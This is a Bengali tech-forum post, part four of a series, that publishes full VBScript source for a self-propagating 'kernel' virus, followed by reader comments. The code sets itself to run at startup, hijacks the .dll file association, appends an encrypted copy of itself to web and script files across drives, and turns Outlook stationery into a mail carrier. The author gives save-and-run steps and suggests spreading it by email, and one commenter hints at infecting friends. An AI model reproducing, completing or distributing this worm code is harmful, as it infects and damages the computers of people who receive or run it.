সাবধান ! শক্তিশালী ভাইরাস কোড (পার্ট-৪)

তৈরী করুন কম্পিউটার ভাইরাস । আজ ৪র্থ পর্ব ।

আজকে kernel ভাইরাসের কোড আপনাদের জানিয়ে দেব ।

এই টিউন সবজান্তাদের জন্য নহে ….. যারা আমার মত কম জানেন তাদের জন্যই এই টিউন । অবশ্যই অপব্যবহারের জন্য নয় ….
ভাইরাস নিয়ে অনেকে টিউন করে গেছেন ।
তাই যদি কোন কোড মিলে যায় জানাবেন সংশোধনের চেষ্টা করব । আর অবশ্যই ইতিবাচক কমেন্ট আশা করছি ।

আজকে যে ভাইরাসের কোড শেয়ার করব সেটি kernel ভাইরাস । এটিও অনেক শক্তিশালী তাই সাবধানে সংরক্ষন করুন । নোটপ্যাড ওপেন করুন এবং নিচের কোডগুলো কপি-পেষ্ট করে দিন । ফাইলটি kernel.vbs or kernel.dll নামে সেভ করুন । ব্যস তৈরী হয়ে গেল ভাইরাস ।
kernel ভাইরাসঃ
এখান হতে কপি করা শুরু করুন

Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsShell,WinPath,SubE,FinalyDisk
Sub KJ_start()
KJSetDim()
KJCreateMilieu()
KJLikeIt()
KJCreateMail()
KJPropagate()
End Sub

Function KJAppendTo(FilePath,TypeStr)
On Error Resume Next
Set ReadTemp = FSO.OpenTextFile(FilePath,1)
TmpStr = ReadTemp.ReadAll
If Instr(TmpStr,"KJ_start()") 0 Or Len(TmpStr) < 1 Then
ReadTemp.Close
Exit Function
End If
If TypeStr = "htt" Then
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,2)
FileTemp.Write "" & vbCrLf & TmpStr & vbCrLf & HtmlText
FileTemp.Close
Set FAttrib = FSO.GetFile(FilePath)
FAttrib.attributes = 34
Else
ReadTemp.Close
Set FileTemp = FSO.OpenTextFile(FilePath,8)
If TypeStr = "html" Then
FileTemp.Write vbCrLf & "" & vbCrLf & "" & vbCrLf & HtmlText
ElseIf TypeStr = "vbs" Then
FileTemp.Write vbCrLf & VbsText
End If
FileTemp.Close
End If
End Function

Function KJChangeSub(CurrentString,LastIndexChar)
If LastIndexChar = 0 Then
If Left(LCase(CurrentString),1) =< LCase("c") Then
KJChangeSub = FinalyDisk & ":\"
SubE = 0
Else
KJChangeSub = Chr(Asc(Left(LCase(CurrentString),1)) - 1) & ":\"
SubE = 0
End If
Else
KJChangeSub = Mid(CurrentString,1,LastIndexChar)
End If
End Function

Function KJCreateMail()
On Error Resume Next
If InWhere = "html" Then
Exit Function
End If
ShareFile = Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery\blank.htm"
If (FSO.FileExists(ShareFile)) Then
Call KJAppendTo(ShareFile,"html")
Else
Set FileTemp = FSO.OpenTextFile(ShareFile,2,true)
FileTemp.Write "" & vbCrLf & "" & vbCrLf & HtmlText
FileTemp.Close
End If
DefaultId = WsShell.RegRead("HKEY_CURRENT_USER\Identities\Default User ID")
OutLookVersion = WsShell.RegRead("HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\MediaVer")
WsShell.RegWrite "HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Compose Use Stationery",1,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Stationery Name",ShareFile)
Call KJMailReg("HKEY_CURRENT_USER\Identities\"&DefaultId&"\Software\Microsoft\Outlook Express\"& Left(OutLookVersion,1) &".0\Mail\Wide Stationery Name",ShareFile)
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settingsa0d020000000000c00000000000004601e0360","blank")
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settingsa0d020000000000c00000000000004601e0360","blank")
WsShell.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Outlook\Options\Mail\EditorPreference",131072,"REG_DWORD"
Call KJMailReg("HKEY_CURRENT_USER\Software\Microsoft\Office\10.0\Common\MailSettings\NewStationery","blank")
KJummageFolder(Left(WinPath,3) & "Program Files\Common Files\Microsoft Shared\Stationery")
End Function

Function KJCreateMilieu()
On Error Resume Next
TempPath = ""
If Not(FSO.FileExists(WinPath & "WScript.exe")) Then
TempPath = "system32\"
End If
If TempPath = "system32\" Then
StartUpFile = WinPath & "SYSTEM\Kernel32.dll"
Else
StartUpFile = WinPath & "SYSTEM\Kernel.dll"
End If
WsShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Kernel32",StartUpFile
FSO.CopyFile WinPath & "web\kjwall.gif",WinPath & "web\Folder.htt"
FSO.CopyFile WinPath & "system32\kjwall.gif",WinPath & "system32\desktop.ini"
Call KJAppendTo(WinPath & "web\Folder.htt","htt")
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\","dllfile"
WsShell.RegWrite "HKEY_CLASSES_ROOT\.dll\Content Type","application/x-msdownload"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\DefaultIcon\",WsShell.RegRead("HKEY_CLASSES_ROOT\vxdfile\DefaultIcon\")
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllfile\ScriptEngine\","VBScript"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\Shell\Open\Command\",WinPath & TempPath & "WScript.exe ""%1"" %*"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ShellEx\PropertySheetHandlers\WSHProps\","{60254CA5-953B-11CF-8C96-00AA00B8708C}"
WsShell.RegWrite "HKEY_CLASSES_ROOT\dllFile\ScriptHostEncode\","{85131631-480C-11D2-B1F9-00C04F86C324}"
Set FileTemp = FSO.OpenTextFile(StartUpFile,2,true)
FileTemp.Write VbsText
FileTemp.Close
End Function

Function KJLikeIt()
If InWhere "html" Then
Exit Function
End If
ThisLocation = document.location
If Left(ThisLocation, 4) = "file" Then
ThisLocation = Mid(ThisLocation,9)
If FSO.GetExtensionName(ThisLocation) "" then
ThisLocation = Left(ThisLocation,Len(ThisLocation) - Len(FSO.GetFileName(ThisLocation)))
End If
If Len(ThisLocation) > 3 Then
ThisLocation = ThisLocation & "\"
End If
KJummageFolder(ThisLocation)
End If
End Function

Function KJMailReg(RegStr,FileName)
On Error Resume Next
RegTempStr = WsShell.RegRead(RegStr)
If RegTempStr = "" Then
WsShell.RegWrite RegStr,FileName
End If
End Function

Function KJOboSub(CurrentString)
SubE = 0
TestOut = 0
Do While True
TestOut = TestOut + 1
If TestOut > 28 Then
CurrentString = FinalyDisk & ":\"
Exit Do
End If
On Error Resume Next
Set ThisFolder = FSO.GetFolder(CurrentString)
Set DicSub = CreateObject("Scripting.Dictionary")
Set Folders = ThisFolder.SubFolders
FolderCount = 0
For Each TempFolder in Folders
FolderCount = FolderCount + 1
DicSub.add FolderCount, TempFolder.Name
Next
If DicSub.Count = 0 Then
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
SubE = 1
Else
If SubE = 0 Then
CurrentString = CurrentString & DicSub.Item(1) & "\"
Exit Do
Else
j = 0
For j = 1 To FolderCount
If LCase(SubString) = LCase(DicSub.Item(j)) Then
If j < FolderCount Then
CurrentString = CurrentString & DicSub.Item(j+1) & "\"
Exit Do
End If
End If
Next
LastIndexChar = InstrRev(CurrentString,"\",Len(CurrentString)-1)
SubString = Mid(CurrentString,LastIndexChar+1,Len(CurrentString)-LastIndexChar-1)
CurrentString = KJChangeSub(CurrentString,LastIndexChar)
End If
End If
Loop
KJOboSub = CurrentString
End Function

Function KJPropagate()
On Error Resume Next
RegPathValue = "HKEY_LOCAL_MACHINE\Software\Microsoft\Outlook Express\Degree"
DiskDegree = WsShell.RegRead(RegPathValue)
If DiskDegree = "" Then
DiskDegree = FinalyDisk & ":\"
End If
For i=1 to 5
DiskDegree = KJOboSub(DiskDegree)
KJummageFolder(DiskDegree)
Next
WsShell.RegWrite RegPathValue,DiskDegree
End Function

Function KJummageFolder(PathName)
On Error Resume Next
Set FolderName = FSO.GetFolder(PathName)
Set ThisFiles = FolderName.Files
HttExists = 0
For Each ThisFile In ThisFiles
FileExt = UCase(FSO.GetExtensionName(ThisFile.Path))
If FileExt = "HTM" Or FileExt = "HTML" Or FileExt = "ASP" Or FileExt = "PHP" Or FileExt = "JSP" Then
Call KJAppendTo(ThisFile.Path,"html")
ElseIf FileExt = "VBS" Then
Call KJAppendTo(ThisFile.Path,"vbs")
ElseIf FileExt = "HTT" Then
HttExists = 1
End If
Next
If (UCase(PathName) = UCase(WinPath & "Desktop\")) Or (UCase(PathName) = UCase(WinPath & "Desktop"))Then
HttExists = 1
End If
If HttExists = 0 Then
FSO.CopyFile WinPath & "system32\desktop.ini",PathName
FSO.CopyFile WinPath & "web\Folder.htt",PathName
End If
End Function

Function KJSetDim()
On Error Resume Next
Err.Clear
TestIt = WScript.ScriptFullname
If Err Then
InWhere = "html"
Else
InWhere = "vbs"
End If
If InWhere = "vbs" Then
Set FSO = CreateObject("Scripting.FileSystemObject")
Set WsShell = CreateObject("WScript.Shell")
Else
Set AppleObject = document.applets("KJ_guest")
AppleObject.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}")
AppleObject.createInstance()
Set WsShell = AppleObject.GetObject()
AppleObject.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}")
AppleObject.createInstance()
Set FSO = AppleObject.GetObject()
End If
Set DiskObject = FSO.Drives
For Each DiskTemp In DiskObject
If DiskTemp.DriveType 2 And DiskTemp.DriveType 1 Then
Exit For
End If
FinalyDisk = DiskTemp.DriveLetter
Next
Dim OtherArr(3)
Randomize
For i=0 To 3
OtherArr(i) = Int((9 * Rnd))
Next
TempString = ""
For i=1 To Len(ThisText)
TempNum = Asc(Mid(ThisText,i,1))
If TempNum = 13 Then
TempNum = 28
ElseIf TempNum = 10 Then
TempNum = 29
End If
TempChar = Chr(TempNum - OtherArr(i Mod 4))
If TempChar = Chr(34) Then
TempChar = Chr(18)
End If
TempString = TempString & TempChar
Next
UnLockStr = "Execute(""Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) = " & OtherArr(0) & """&vbCrLf&""KeyArr(1) = " & OtherArr(1) & """&vbCrLf&""KeyArr(2) = " & OtherArr(2) & """&vbCrLf&""KeyArr(3) = " & OtherArr(3) & """&vbCrLf&""For i=1 To Len(ExeString)""&vbCrLf&""TempNum = Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18 Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod 4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar = vbCr""&vbCrLf&""ElseIf TempChar = Chr(29) Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"")" & vbCrLf & "Execute(ThisText)"
ThisText = "ExeString = """ & TempString & """"
HtmlText ="" & vbCrLf & "document.write " & """" & "" & "" & "" & """" & vbCrLf & "" & vbCrLf & "" & vbCrLf & ThisText & vbCrLf & UnLockStr & vbCrLf & "" & vbCrLf & "" & vbCrLf & ""
VbsText = ThisText & vbCrLf & UnLockStr & vbCrLf & "KJ_start()"
WinPath = FSO.GetSpecialFolder(0) & "\"
If (FSO.FileExists(WinPath & "web\Folder.htt")) Then
FSO.CopyFile WinPath & "web\Folder.htt",WinPath & "web\kjwall.gif"
End If
If (FSO.FileExists(WinPath & "system32\desktop.ini")) Then
FSO.CopyFile WinPath & "system32\desktop.ini",WinPath & "system32\kjwall.gif"
End If
End Function

কপি করা শেষ করুন

এই kernel ভাইরাসটি ই-মেইল করে পাঠাতে পারেন, কিংবা যে কোন মাধ্যম ব্যবহার করতে পারেন ।
বেশীকিছু জানতে পরীক্ষামূলক ভাবে চালিয়ে দেখতে পারেন ।

পূর্ববর্তী টিউন গুলো দেখার জন্য

১. সাবধান ! শক্তিশালী ভাইরাস কোড (পার্ট-১)

২. সাবধান ! শক্তিশালী ভাইরাস কোড (পার্ট-২)

৩. সাবধান ! শক্তিশালী ভাইরাস কোড (পার্ট-৩)

অপেক্ষায় থাকুন পরবর্তী ভাইরাসের কোডের জন্য ।

Level 0

আমি Mahfuzar Rahman। বিশ্বের সর্ববৃহৎ বিজ্ঞান ও প্রযুক্তির সৌশল নেটওয়ার্ক - টেকটিউনস এ আমি 14 বছর 2 মাস যাবৎ যুক্ত আছি। টেকটিউনস আমি এ পর্যন্ত 31 টি টিউন ও 254 টি টিউমেন্ট করেছি। টেকটিউনসে আমার 0 ফলোয়ার আছে এবং আমি টেকটিউনসে 0 টিউনারকে ফলো করি।

I am moving ....


টিউনস


আরও টিউনস


টিউনারের আরও টিউনস


টিউমেন্টস

মাথাডা চক্কর খাইল!

আমার ও খাইল

    কেট্যায় খ্যাইলো, ভাইরাসে নাকি আবার …..

Ata kothai pailel….?

    ভাই আমার কাছে ৫ শয়ের উপরে ভাইরাসের কোড আছে । এটা আমার এক প্রকার শখ । বিভিন্ন সাইট, ফোরাম থেকে মডিফাই করে রাখা হয়েছে , আমাদের প্রায়ই সে সব ভাইরাসের কবলে পড়তে হয় আমি কমবেশী সেগুলো ভাইরাসের কোড আপনাদের সাথে শেয়ার করার চেষ্টা করেছি মাত্র । আগেই বলেছি এই টিউন সবজান্তাদের জন্য নহে ….. যারা আমার মত কম জানেন তাদের জন্যই এই টিউন ।
    ধন্যবাদ

এগুলো কি কাজ করে তা কিন্তু খুব কম লোকেই জানে……anyway….thnx for sharing…

ata diye ki kora jay?

Level 0

programming language er name ki?

    এগুলো সাধারনত জাভা স্ক্রিপ দিয়ে লেখা হয় ….

এই কোড দিলেন না অন্য কিছু 😉 না বাবা থাক আমি বরং এখন পেজ টা ক্লোজ করি 😉 😛 😀 🙂

    কেন বাঁধন ভাই, ভাইরাস কি করবে …… আপনার কি শক্তি নাই ?
    anyway আপনার হোম ডিসট্রিক কি নীলফামারী ?
    জানাবেন…

এক খান কথা।
এই এটি কোন লেঙ্গুয়েজে লেখা?

আপনি কি ৫০০ এর বেশি কোড গুলা টেক্সট ফাইল হিসেবে সেভ করে রাখছেন নাকি .vbs হিসেবে?
আর এই kernel ভাইরাসের কাজ কি?
(নিজের কাছে ভাইরাস থাকলে কম জানা বন্ধু সাথে এক্সট্রা পার্ট নেয়া যায়, তবে সমস্যা হইল তারা আমার পিসি থেকে কোন গান বা ফাইল নিতে চায় না, আবার আমার পেন্ড্রাইভ ও তাদের পিসিতে ঢুকাইতে দেয় না।)

    আমি টেক্সট এবং .vbs/.exe/.c কোড দিয়ে সেভ করে রেখেছি । মানে যখন যে কোডটা (.vbs/.exe/.c) লাগে ।
    তবে টেক্সট গুলো আলাদা করে রেখেছি আর তৈরী করা ফাইলগুলো নিরাপদে সংরক্ষন করে রেখেছি ।
    অনেক ভাইরাসগুলোর টেক্সট ফাইলটিও সক্রিয় হয় তাই ফাইলগুলো ডাবল ক্লিক করে ওপেন না করাই ভাল ।
    ধন্যবাদ

মজার ব্যাপারতো। কোডগুলো নোটপ্যাডে লিখে সেভ করার সাথে সাথেই আমার এন্টি-ভাইরাস মুছে ফেলছে।

    আর আপনার সাবধান ! শক্তিশালী ভাইরাস কোড (পার্ট-৫)-এ তো ঢোকাই যায় না। এন্টি-ভাইরাস পেজ বন্ধ করে দেয়। দেখায় যে, Probably Unknown Virus Script – Connection terminated. এখানে উল্লেখ্য যে আমি ESET NOD32 Antivirus ব্যাবহার করি।

    পার্ট ২ ও ১ এর ক্ষেত্রেও এটা ঘটছে।(আসলে দেখায় probably unknown SCRIPT virus)

    ধন্যবাদ মন্তব্য শেয়ার করার জন্য…..

Level 0

bhai akta kotha bolbo, apni sob virus code file gulo 1ta .rar file kore mediafire e upload korun ba apnar blogspot e adf.ly te upld kore din tahole apnar kichu aay hobe abar amrao dwnld korte parbo, plz bhai amar kotha ta ek2 bhebe dakhen

Level New

Eta ki save korlei kaj shuru kore dey naki double click kore open korte hoi?

ভাই এ ভারাস গুলো pc আক্রমন কারি code plese tell me

Level 0

vai amar pcte skype call korte pari na “kernell32.dll”error astece ki korte oari bai….?l